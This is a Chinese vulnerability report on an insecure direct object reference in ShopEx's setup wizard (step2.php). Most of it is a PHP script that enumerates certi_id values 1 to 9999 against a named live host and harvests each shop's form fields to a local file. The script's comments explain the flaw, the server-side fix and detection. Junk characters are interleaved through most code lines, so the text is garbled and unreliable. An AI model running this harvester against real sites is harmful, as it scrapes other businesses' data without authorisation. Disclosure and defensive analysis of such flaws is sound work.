|
简要描述:
ShopEx 某接口缺陷，可遍历所有网站
详细说明:
问题出现在 ShopEx 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站
<?php# v/ M5 |( E" P- ]
& f2 G3 A! K7 V7 w/ O
// Enumeration harness: walks certi_id 1..9999 and queries the wizard page
// for each one. The flaw it demonstrates is server-side: step2.php trusts
// the certi_id carried inside the base64 "refer" parameter without checking
// that it belongs to the requesting session (an insecure direct object
// reference), so sequential ids expose every installed shop. The fix belongs
// on the server: bind certi_id to the authenticated session (or replace it
// with an unguessable token) and rate-limit the page. The access pattern this
// produces — sequential ids from one client with no pause between requests —
// is also straightforward to alert on.
for ($i=1; $i < 10000; $i++) { // iterate over candidate certi_id values
# k4 u0 H u b: L; H; S) U3 Q/ W+ G9 D1 M
ShowshopExD($i);
; Z! W+ z$ S; y7 Y+ Q7 `3 R3 `' N& U& s' k* _
}
! h [+ s" k% M: U' M; {+ u6 \$ q
/**
 * Fetches the ShopEx guide page step2.php for one certi_id and, when the
 * response echoes the refer value back, extracts the name/value pair of
 * every <input type="text"> field, echoes each pair and appends it to
 * c:/shopEx.txt.
 *
 * What this shows from the server's side: the certi_id inside the base64
 * "refer" parameter is trusted as-is, so any caller can read another shop's
 * wizard fields (an insecure direct object reference). base64 is an encoding,
 * not a secret, so changing the encoding does not close the hole; the page
 * has to verify that certi_id belongs to the requesting session. A defender
 * would see many refer values differing only in certi_id, hitting step2.php
 * from one client back-to-back.
 *
 * @param int|string $cid certi_id to query; coerced with intval() below
 * @return void
 */
4 Y3 W, p3 {! ~" p. j function ShowshopExD($cid) {
- p( R& _$ f2 E+ S
// base URL of the shop setup wizard step page
3 ]' u' }2 [& S7 Y3 M) S3 T $url='http://guide.ecos.shopex.cn/step2.php'; O; ? R2 a, z) w0 t
// refer is plain JSON, base64-encoded; certi_id is the only per-shop value in it
6 K5 |5 a# O6 j @$ Y4 ^ $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');; f. ~! ?) I9 n; x8 W6 f
* s4 G# W9 Y: w1 _1 h+ C $url = $url.'?refer='.$refer;
/ |. o: _6 x4 p, A* w: ?
// fetch the page body as a string (returned from curl_exec rather than printed)
; D, W3 o6 ~$ i/ o $ch = curl_init($url);6 a T2 j; M( D/ f& m& i1 a
$ h) T, n$ J0 F6 I curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
, v6 O- Q4 H0 o a' l# s: h3 b; n% e# P7 H. D4 [! m; b5 D
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;4 @/ t: I9 U6 `
3 }% y/ U' o3 H/ Q$ Q- |: k $result = curl_exec($ch);
2 i# m: e; v2 \: f# Y& q% C. `5 O; ?; I# J' x4 G+ U* f) ~* d; L
// re-encode the response to GB2312 before matching against it
$result = mb_convert_encoding($result, "gb2312", "UTF-8");6 U2 Z+ V* q" g& B& U9 L
// a response that contains the refer value is treated as a hit for this certi_id
$ W' j0 N5 g' I7 ~- ]# B/ \ if(strpos($result,$refer))
+ h2 p0 C1 Q, n% S- a% Y: m1 [4 K n2 o
{
- \, b! d; O0 Q% Y1 j$ S# _$ Q' G: L
$fp = fopen("c:/shopEx.txt",'ab'); // append harvested fields to a local file
// capture the attribute text of every <input type="text" .../> in the page
7 |7 H+ e! B0 v0 |* y preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);# attribute text of each text input
6 v) X6 U9 o) R4 j* e( ~. L0 y
foreach ($value[1] as $key) {7 }# v+ F0 s( y! h* ~% E! l
9 A4 e+ @% c( P( N% Z ` H3 x
// pull the name="…" and value="…" attribute values out of the captured text
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
9 `* ?5 a/ C0 r( v3 d9 m. U' l7 f6 f, t
// print and persist one "name:value" line per field
echo $res[1][0].':'.$res[3][0]."\r\n";! n5 t7 Y6 P! `- m5 I- L
6 [* |- k( n) B
$col =$res[1][0].':'.$res[3][0]."\r\n";
2 i! O* \0 j4 H% j- |' n5 E& M' b# t! J- b* X3 D* A6 ]+ w
fwrite($fp, $col, strlen($col));
; F. M: y' y4 ?7 i) G/ L2 z8 u6 H. q' [ o: E- c( n" s* [
}
* x& ]! g7 X# R( E6 i2 l2 {1 E+ N) ^
// separator between one shop's fields and the next
echo '--------------------------------'."\r\n";% u" A0 [/ A2 U
# T5 i' p% j8 F9 L# s
fclose($fp); : Y- }2 R6 t( T2 M G) B
( d- l7 I# d2 t" C1 }3 [% B. n }: H. e0 Z. ?8 ]6 t& X& X
$ o6 h9 Y8 d" _. w
// push buffered output, then release the curl handle
flush();
" B' Z9 Z, {! F. O
: B9 G1 o: b8 P' x* B8 B curl_close($ch);* h% z1 ^ k9 O/ Q R1 V8 r
5 J" B/ e8 h7 w$ v }2 e/ z* @ ~( V8 T
# E3 _% w' \" l# A* h
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer 换成其他加密方式（补充：base64 只是编码而非加密，单纯更换 refer 的编码或加密方式仍挡不住遍历——服务端应校验 certi_id 是否属于当前已认证的会话，并对 step2.php 做请求频率限制。）
|